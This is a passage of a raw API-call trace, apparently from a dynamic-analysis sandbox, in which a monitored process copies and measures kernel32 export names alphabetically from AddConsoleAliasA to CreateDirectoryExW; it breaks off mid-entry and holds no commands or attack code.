lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.402] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.403] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.403] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.403] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.403] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.403] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.403] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.403] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.403] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.403] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.403] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.403] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.403] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.403] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.403] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.403] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.403] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.403] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.403] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.404] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.404] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.404] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.404] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.404] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.404] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.404] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.404] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.404] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.404] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.404] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.404] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.404] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.404] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.404] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.404] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.404] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.404] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.404] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.404] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.404] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.404] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.404] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.404] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.404] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.404] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.404] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.404] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.404] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.404] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.404] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.404] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.404] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.404] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.404] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.404] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.404] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.405] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.405] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.405] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.405] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.405] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.405] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.405] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.405] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.405] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.405] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.405] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.405] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.405] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.405] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.405] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.405] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.405] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.405] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.405] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.405] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.405] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.405] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.405] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.405] lstrlenA (lpString="BEEP") returned 4 [0084.405] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.405] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.405] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.405] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.405] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.405] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.405] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.405] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.405] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.405] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.405] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.405] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.405] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.405] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.406] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.406] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.406] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.406] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.406] lstrlenA (lpString="CANCELIO") returned 8 [0084.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.406] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.406] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.406] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.406] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.406] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.406] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.406] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.406] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.406] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.406] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.406] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.406] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.406] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.407] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.407] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.407] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.407] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.407] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.407] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.407] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.407] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.407] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.407] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.407] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.407] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.407] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.407] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.407] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.407] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.407] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.407] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.407] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.408] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.408] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.408] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.408] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.408] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.408] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.408] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.408] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.408] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.408] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.408] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.408] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.408] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.408] lstrlenA (lpString="COPYFILEA") returned 9 [0084.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.408] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.408] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.408] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.409] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.409] lstrlenA (lpString="COPYFILEW") returned 9 [0084.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.409] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.409] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.409] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.409] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.409] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.409] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.409] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.409] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: 